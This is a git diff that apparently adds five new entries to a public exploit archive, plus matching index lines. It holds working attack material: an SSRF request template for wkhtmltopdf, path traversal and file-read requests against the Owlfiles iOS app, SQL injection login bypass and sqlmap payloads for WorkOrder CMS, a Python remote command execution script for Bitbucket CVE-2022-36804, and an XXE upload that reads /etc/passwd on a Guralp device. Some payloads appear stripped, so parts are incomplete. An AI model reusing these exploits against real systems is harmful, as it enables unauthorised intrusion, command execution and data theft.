diff --git a/exploits/asp/webapps/51039.txt b/exploits/asp/webapps/51039.txt new file mode 100644 index 000000000..e35ebf42e --- /dev/null +++ b/exploits/asp/webapps/51039.txt @@ -0,0 +1,26 @@ +# Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery +# Date: 20/8/2022 +# Exploit Author: Momen Eldawakhly (Cyber Guy) +# Vendor Homepage: https://wkhtmltopdf.org +# Software Link: https://wkhtmltopdf.org/downloads.html +# Version: 0.12.6 +# Tested on: Windows ASP.NET + +POST /PDF/FromHTML HTTP/1.1 +Host: vulnerable.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers +Connection: close + +__RequestVerificationToken=Token&header=....&data= .... \ No newline at end of file diff --git a/exploits/ios/webapps/51036.txt b/exploits/ios/webapps/51036.txt new file mode 100644 index 000000000..d4dbfe17f --- /dev/null +++ b/exploits/ios/webapps/51036.txt @@ -0,0 +1,128 @@ +# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities +# Date: Sep 19, 2022 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://www.skyjos.com/ +# Software Link: +https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 +# Version: 12.0.1 +# Tested on: iPhone iOS 16.0 + + + +########### +path traversal on HTTP built-in server +########### + +GET /../../../../../../../../../../../../../../../System/ HTTP/1.1 +Host: localhost:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) +AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e +Safari/8536.25 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +If-None-Match: 42638202/1663558201/177889085 +If-Modified-Since: Mon, 19 Sep 2022 03:30:01 GMT +Connection: close +Content-Length: 0 + +------- +HTTP/1.1 200 OK +Cache-Control: max-age=3600, public +Content-Length: 317 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +Date: Mon, 19 Sep 2022 05:01:11 GMT + + + + + + + +############# +LFI on HTTP built-in server +############# + +GET /../../../../../../../../../../../../../../../etc/hosts HTTP/1.1 +Host: localhost:8080 +Accept: application/json, text/javascript, */*; q=0.01 +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) +AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e +Safari/8536.25 +X-Requested-With: XMLHttpRequest +Referer: http://localhost:8080/ +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Connection: close + + +---- + +HTTP/1.1 200 OK +Connection: Close +Server: GCDWebUploader +Content-Type: application/octet-stream +Last-Modified: Sat, 03 Sep 2022 01:37:01 GMT +Date: Mon, 19 Sep 2022 03:28:14 GMT +Content-Length: 213 +Cache-Control: max-age=3600, public +Etag: 1152921500312187994/1662169021/0 + +## +# Host Database +# +# localhost is used to configure the loopback interface +# when the system is booting. Do not change this entry. +## +127.0.0.1 localhost +255.255.255.255 broadcasthost +::1 localhost + + + +############### +path traversal on FTP built-in server +############### + +ftp> cd ../../../../../../../../../ +250 OK. Current directory is /../../../../../../../../../ +ftp> ls +200 PORT command successful. +150 Accepted data connection +total 10 +drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr +drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin +drwxr-xr-x 0 root wheel 608 Jan 01 1970 sbin +drwxr-xr-x 0 root wheel 224 Jan 01 1970 System +drwxr-xr-x 0 root wheel 640 Jan 01 1970 Library +drwxr-xr-x 0 root wheel 224 Jan 01 1970 private +drwxr-xr-x 0 root wheel 1131 Jan 01 1970 dev +drwxr-xr-x 0 root admin 4512 Jan 01 1970 Applications +drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer +drwxr-xr-x 0 root admin 64 Jan 01 1970 cores +WARNING! 10 bare linefeeds received in ASCII mode +File may not have transferred correctly. +226 Transfer complete. +ftp> + +############# +XSS on HTTP built-in server +############# + +poc 1: + +http://localhost:8080/download?path= + +poc 2: + +http://localhost:8080/list?path= \ No newline at end of file diff --git a/exploits/php/webapps/51038.txt b/exploits/php/webapps/51038.txt new file mode 100644 index 000000000..c7d713aa9 --- /dev/null +++ b/exploits/php/webapps/51038.txt @@ -0,0 +1,75 @@ +# Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection +# Date: Sep 22, 2022 +# Exploit Author: Chokri Hammedi +# Vendor Homepage: https://github.com/romzes13/WorkOrderCMS +# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip +# Version: 0.1.0 +# Tested on: Linux + +# Auth Bypass: + + +username:' or '1'='1 + +password:' or '1'='1 + + +#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql + + +# POST Requests: + + +Parameter: #1* ((custom) POST) + + Type: error-based + + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + + Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT +COUNT(*),CONCAT(0x7170627071,(SELECT +(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/ + + + Type: stacked queries + + Title: MySQL >= 5.0.12 stacked queries (comment) + + Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/ + + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM +(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/ + + +Parameter: #2* ((custom) POST) + + Type: error-based + + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + + Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT +COUNT(*),CONCAT(0x7170627071,(SELECT +(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/ + + + Type: stacked queries + + Title: MySQL >= 5.0.12 stacked queries (comment) + + Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/ + + + Type: time-based blind + + Title: MySQL >= 5.0.12 OR time-based blind (SLEEP) + + Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/ \ No newline at end of file diff --git a/exploits/python/webapps/51040.txt b/exploits/python/webapps/51040.txt new file mode 100644 index 000000000..89fc381bc --- /dev/null +++ b/exploits/python/webapps/51040.txt @@ -0,0 +1,66 @@ +# Exploit Title: Bitbucket v7.0.0 - RCE +# Date: 09-23-2022 +# Exploit Author: khal4n1 +# Vendor Homepage: https://github.com/khal4n1 +# Tested on: Kali and ubuntu LTS 22.04 +# CVE : cve-2022-36804 + +#****************************************************************# +#The following exploit is used to exploit a vulnerability present +#Atlassian Bitbucket Server and Data Center 7.0.0 before version +#7.6.17, from version 7.7.0 before version 7.17.10, from version +#7.18.0 before version 7.21.4, from version 8.0.0 before version +#8.0.3, from version 8.1.0 before version 8.1.3, and from version +#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 + +#Usage Example + +# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd' + +# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id' + +#The server will send a 500 http response with the stout output from the +# command executed. + + +#****************************************************************# + +#!/usr/bin/python3 + +import argparse +import urllib +from urllib import request +import re + +#argument setup +parser = argparse.ArgumentParser(description='Program to test +bitbucket vulnerability CVE-2022-36804') +parser.add_argument("--url", help="Set the target to attack. +[REQUIRED]", required=True ) +parser.add_argument("--cmd", help="Set the command to execute. +[DEFAULT ID]", required=True, default='id') +args = parser.parse_args() +cmd= urllib.parse.quote(args.cmd) + + +#reads from the public repository what is available +requ = request.urlopen(args.url+ "/repos?visibility=public") +response = requ.read() + +#select a public project and stores it in a variable +project = re.findall('7990/projects/(.*)/repos/', +str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1] + +#Selects a public repo and stores it in a vatiable +file = re.findall('/repos/(.*)/browse', +str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0] + +# Exploitation +try : + attack = request.urlopen(args.url + +"/rest/api/latest/projects/" + project + "/repos/" + file + +"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin") + print (attack.response()) +except urllib.error.HTTPError as e: + body = e.read().decode() # Read the body of the error response + print (body) \ No newline at end of file diff --git a/exploits/xml/webapps/51037.txt b/exploits/xml/webapps/51037.txt new file mode 100644 index 000000000..daccfc6d3 --- /dev/null +++ b/exploits/xml/webapps/51037.txt @@ -0,0 +1,644 @@ +# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE +# Date: 2022-09-19 +# Exploit Author: Ahmed Alroky +# Author: http://guralp.com/ +# Version: 3.2.4 +# Authentication Required: NO +# CVE : CVE-2022-38840 +# Google dork: " webconfig menu.cgi " +# Tested on: Windows + + +# Exploit + +1 - browse to http:// name>/cgi-bin/xmlstatus.cgi +2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form +3 - you will get /etc/passwd file content + +#XML exploit code + +``` + + ]> + + +false +platinum +102 +running +GPS +FLL +46196 +true +2022-06-14T11:26:53Z +6.1e-08 + + +running +never + +4.6% +-0.3% +-0.3% + + +running +never + + + +running +never + + + +11374055 +331 +1567 +0 + + + + +16 +5 +7338920142 +213600 + + +gdi2gcf[default] + + +gdi-link-tx[default] + + +gdi2miniseed[default] + + +das-in + + +das-in-textstatus + + + + +DONB.HHZ.TM.00 + + +DONB.HHN.TM.00 + + +DONB.HHE.TM.00 + + +DONB.HDF.TM.X0 + + +DONB.HNZ.TM.10 + + +DONB.HNN.TM.10 + + +DONB.HNE.TM.10 + + +DONB.MMZ.TM.00 + + +DONB.MMN.TM.00 + + +DONB.MME.TM.00 + + +DONB.SOH.TM.0 + + +DONB-AIB + + +DONB.SOH.TM.1 + + +DONB-BIB + + +DONB.SOH.TM.X + + +DONB-XIB + + + + +11273973132 +325518 +1085.06 +1565 +0 + + + + +7439096490 +216516 +11374055 +331 + + +100 +DONB-AZ0 +2022-06-14T11:26:46.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-AN0 +2022-06-14T11:26:46.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-AE0 +2022-06-14T11:26:45.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-XX0 +2022-06-14T11:26:35.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-BZ0 +2022-06-14T11:26:48.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-BN0 +2022-06-14T11:26:42.000000000Z +CMG-DAS +0 +1 + + +100 +DONB-BE0 +2022-06-14T11:26:40.000000000Z +CMG-DAS +0 +1 + + +4 +DONB-AM8 +2022-06-14T11:24:48.000000000Z +CMG-DAS +0 + + + +4 +DONB-AM9 +2022-06-14T11:23:47.000000000Z +CMG-DAS +0 + + + +4 +DONB-AMA +2022-06-14T11:23:57.000000000Z +CMG-DAS +0 + + + +nan +DONB-A00 + +CMG-DAS +0 + + + +nan +DONB-AIB + +CMG-DAS +0 + + + +nan +DONB-B00 + +CMG-DAS +0 + + + +nan +DONB-BIB + +CMG-DAS +0 + + + +nan +DONB-X00 + +CMG-DAS +0 + + + +nan +DONB-XIB + +CMG-DAS +0 + + + + + +6184483152 +180000 +0 +0 +22682743 +655 + + +true +2022-06-14T11:26:53Z +3D +2022-06-14T11:26:53Z +13.909917 +100.593734 +3 +26 +12 +2022-06-14T11:26:52Z +true + + +direct_gps +NTP is using a GPS reference source. +true +0.000131 +GPS +127.127.28.1 +GPS + + +22682743 +655 +3382931 +7 + + +123.160.221.22 +21100 +false +0 + + +113.53.234.98 +33964 +false +0 + + +203.114.125.67 +48666 +false +3221351 + + +113.53.234.98 +45158 +false +3382931 + + +221.128.101.50 +55776 +false +3382931 + + +118.175.2.50 +60818 +false +3382931 + + +203.114.125.67 +53984 +false +3382931 + + + + +Inactive +Last flush good +2022-06-14T08:10:14Z +27.2% +17449811968 +64134021120 +VFAT + + + + +DAS-405D62 +10307538 +1.72 +437809152 +77.0% +&example; +15809 +CMG-DAS +2021-04-08T05:06:17Z +2021-04-08T07:02:50Z +2021-04-08T08:00:33Z +2021-04-08T08:30:41Z +2021-04-08T08:39:15Z +2021-04-08T08:46:24Z +2021-04-08T10:08:51Z +2021-04-09T07:10:41Z +2021-10-07T06:48:35Z +2022-02-15T04:14:30Z +43.875 +12.75 +0.442 +12.675 +0.289 +12.725 +0.002 + + + +``` \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 62f992a32..a5ef53b93 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1765,6 +1765,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,webapps,asp,,2005-12-29,2017-11-01,1,,,,,, 39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Remote Code Execution",2016-01-13,"Matt Buzanowski",webapps,asp,,2016-01-13,2016-01-13,0,CVE-2015-8261;OSVDB-132657,,,,, 8596,exploits/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,webapps,asp,,2009-05-03,,1,OSVDB-63338;CVE-2009-4760,,,,, +51039,exploits/asp/webapps/51039.txt,"wkhtmltopdf 0.12.6 - Server Side Request Forgery",2023-03-23,"Momen Eldawakhly",webapps,asp,,2023-03-23,2023-03-23,0,CVE-2022-35583,,,,, 25790,exploits/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,webapps,asp,,2005-06-06,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13859/info 3032,exploits/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,webapps,asp,,2006-12-27,,1,OSVDB-32511;CVE-2006-6846;OSVDB-32510;OSVDB-32509,,,,, 3469,exploits/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp?id' SQL Injection",2007-03-13,CyberGhost,webapps,asp,,2007-03-12,2016-09-27,1,OSVDB-34040;CVE-2007-1570;CVE-2007-1438,,,,http://www.exploit-db.comxice_haberv1.zip, @@ -5107,6 +5108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31691,exploits/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - Local File Inclusion",2014-02-16,Vulnerability-Lab,webapps,ios,8080,2014-02-16,2014-02-16,0,OSVDB-103413,,,,,https://www.vulnerability-lab.com/get_content.php?id=1197 26890,exploits/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,webapps,ios,,2013-07-16,2013-07-16,0,OSVDB-95772;OSVDB-95771,,,,,https://www.vulnerability-lab.com/get_content.php?id=1009 28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,,2013-10-15,2013-10-15,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1110 +51036,exploits/ios/webapps/51036.txt,"Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities",2023-03-23,"Chokri Hammedi",webapps,ios,,2023-03-23,2023-03-23,0,,,,,, 34957,exploits/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,webapps,ios,,2014-10-14,2014-10-14,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=895 32866,exploits/ios/webapps/32866.txt,"PDF Album 1.7 iOS - Local File Inclusion",2014-04-14,Vulnerability-Lab,webapps,ios,,2014-04-14,2014-04-14,0,OSVDB-105787,,,,,https://www.vulnerability-lab.com/get_content.php?id=1255 36924,exploits/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,webapps,ios,,2015-05-08,2015-05-08,0,OSVDB-121802,,,,,https://www.vulnerability-lab.com/get_content.php?id=1480 @@ -33371,6 +33373,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 25014,exploits/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,webapps,php,,2004-12-17,2013-04-25,1,OSVDB-12504,,,,,https://www.securityfocus.com/bid/12009/info 23753,exploits/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",webapps,php,,2004-02-24,2012-12-30,1,CVE-2004-2374;OSVDB-4063,,,,,https://www.securityfocus.com/bid/9737/info 4653,exploits/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,webapps,php,,2007-11-23,,1,OSVDB-39278;CVE-2007-6128,,,,, +51038,exploits/php/webapps/51038.txt,"WorkOrder CMS 0.1.0 - SQL Injection",2023-03-23,"Chokri Hammedi",webapps,php,,2023-03-23,2023-03-23,0,,,,,, 7481,exploits/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,webapps,php,,2008-12-14,,1,OSVDB-50726;CVE-2008-5765;OSVDB-50725;CVE-2008-5764,,,,, 11550,exploits/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,webapps,php,,2010-02-22,2017-01-05,1,,,,,, 47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,, @@ -34121,6 +34124,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,,2020-10-16,2020-10-16,0,,,,,, 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,, 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,, +51040,exploits/python/webapps/51040.txt,"Bitbucket v7.0.0 - RCE",2023-03-23,khal4n1,webapps,python,,2023-03-23,2023-03-23,0,CVE-2022-36804,,,,, 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb, 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,, 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/ @@ -45542,6 +45546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,,2018-04-09,2018-05-21,0,,,,,, 43113,exploits/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",webapps,xml,,2017-11-03,2017-11-03,0,,"XML External Entity (XXE)",,,http://www.exploit-db.comladon-0.9.40.tar.gz,https://www.redteam-pentesting.de/advisories/rt-sa-2016-008 37977,exploits/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",webapps,xml,,2015-08-26,2015-08-26,0,CVE-2015-1397;OSVDB-121260,,,,, +51037,exploits/xml/webapps/51037.txt,"MAN-EAM-0003 V3.2.4 - XXE",2023-03-23,"Ahmed Alroky",webapps,xml,,2023-03-23,2023-03-23,0,CVE-2022-38840,,,,, 45337,exploits/xml/webapps/45337.txt,"NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)",2018-09-06,LiquidWorm,webapps,xml,,2018-09-06,2018-09-06,0,,"XML External Entity (XXE)",,,, 38897,exploits/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,webapps,xml,,2015-12-08,2015-12-08,0,OSVDB-131537,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php 38899,exploits/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,webapps,xml,,2015-12-08,2015-12-08,0,OSVDB-131535,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php